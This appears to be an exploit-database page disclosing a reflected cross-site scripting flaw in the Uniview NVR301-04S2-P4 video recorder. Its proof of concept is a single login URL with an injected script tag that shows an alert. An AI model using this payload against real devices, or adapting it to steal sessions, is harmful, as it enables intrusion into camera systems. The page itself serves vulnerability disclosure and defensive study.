Uniview nvr30104s2p4 reflected crosssite scripting (xss) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-03-29 | Type : webapps | Platform : hardware
This exploit / vulnerability Uniview nvr30104s2p4 reflected crosssite scripting (xss) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)
# Author: Bleron Rrustemi
# Discovery Date: 2022-11-15
# Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/
# Datasheet:: https://www.uniview.com/download.do?id=1761643
# Device Firmware: NVR-B3801.20.15.200829
# Tested Version: NVR301-04S2-P4
# Tested on: Windows 10 Enterprise LTSC 64\Firefox 106.0.5 (64-bit)
# Vulnerability Type: Reflected Cross-Site Scripting (XSS)
# CVE: N/A





# Proof of Concept:

IP=IP of the device

http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('1')</script>



Best regards,

Bleron Rrustemi
Chief Technology Officer
Direct: +383 (0) 49 955 503
E-mail: <mailto:bleron@drugeza.com> bleron@drugeza.com



<http://>

Drugëza SHPK
Rr. Lekë Dukagjini p.n
Prishtinë, 10000 • Kosovo
​Tel.: +383 49 955 503
www.drugeza.com




ü Be GREEN, keep it on the SCREEN

Uniview nvr30104s2p4 reflected crosssite scripting (xss)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Uniview nvr30104s2p4 reflected crosssite scripting (xss) Vulnerability / Exploit